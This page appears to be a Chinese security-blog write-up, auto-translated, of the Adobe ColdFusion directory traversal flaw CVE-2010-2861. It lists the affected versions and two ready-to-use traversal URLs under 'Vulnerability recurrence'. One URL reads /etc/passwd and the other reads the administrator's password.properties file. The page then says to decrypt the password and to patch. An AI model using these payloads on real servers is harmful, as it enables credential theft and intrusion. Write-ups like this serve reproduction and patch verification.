当前位置:网站首页>Coldfusion file read holes (CVE - 2010-2861)
Coldfusion file read holes (CVE - 2010-2861)
2022-07-31 01:52:00 【1stPeak】
Disclaimer: All my articles are for technical sharing, please do not use them illegally for other purposes, otherwise you will be responsible for the consequences.
Vulnerability description
CVE-2010-2861
Adobe ColdFusion is a dynamic Web server product of Adobe Corporation of the United States. Its running CFML (ColdFusion Markup Language) is a programming language for Web applications.
A directory traversal vulnerability exists in Adobe ColdFusion 8 and 9 that could allow unauthorized users to read arbitrary files on the server.
Vulnerability impact
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
Vulnerability recurrence
1. Direct access to http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en, you can read the file /etc/passwd

2. Read the background administrator password http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en

Decrypt password
Bug fixes
Patch, upgrade version
边栏推荐
- Between two orderly array of additive and Topk problem
- Software testing basic interface testing - getting started with Jmeter, you should pay attention to these things
- MySQL的存储过程
- 【AcWing 第62场周赛】
- Arbitrum Interview | L2 Summer, what does the standout Arbitrum bring to developers?
- GCC Rust is approved to be included in the mainline code base, or will meet you in GCC 13
- 曼城推出可检测情绪的智能围巾,把球迷给整迷惑了
- [WeChat applet] This article takes you to understand data binding, event binding, event parameter transfer, and data synchronization
- MySql的初识感悟,以及sql语句中的DDL和DML和DQL的基本语法
- Gateway路由的配置方式
猜你喜欢

Can an inexperienced college graduate switch to software testing?my real case

coldfusion8后台计划任务拿shell

Problems that need to be solved by the tcp framework

《MySQL数据库进阶实战》读后感(SQL 小虚竹)

16、注册中心-consul

tcp框架需要解决的问题

After reading "MySQL Database Advanced Practice" (SQL Xiao Xuzhu)

MySql的安装配置超详细教程与简单的建库建表方法

Multiplication, DFS order

rpm安装postgresql12
随机推荐
软件测试报告有哪些内容?
VSCode Plugin: Nested Comments
来自一位女测试工程师的内心独白...
Unity界面总体介绍
leetcode-399: division evaluation
Problems that need to be solved by the tcp framework
PDF 拆分/合并
Fiddler captures packets to simulate weak network environment testing
Are you still working hard on the limit of MySQL paging?
GCC Rust获批将被纳入主线代码库,或将于GCC 13中与大家见面
【AcWing 62nd Weekly Game】
CV-Model [3]: MobileNet v2
[Map and Set] LeetCode & Niu Ke exercise
Drools WorkBench的简介与使用
"Cloud native's master, master and vulgar skills" - 2022 National New College Entrance Examination Volume I Composition
软件测试缺陷报告---定义,组成,缺陷的生命周期,缺陷跟踪产后处理流程,缺陷跟踪处理流程,缺陷跟踪的目的,缺陷管理工具
tcp框架需要解决的问题
【Map与Set】之LeetCode&牛客练习
Jiuzhou Cloud was selected into the "Trusted Cloud's Latest Evaluation System and the List of Enterprises Passing the Evaluation in 2022"
系统需求多变如何设计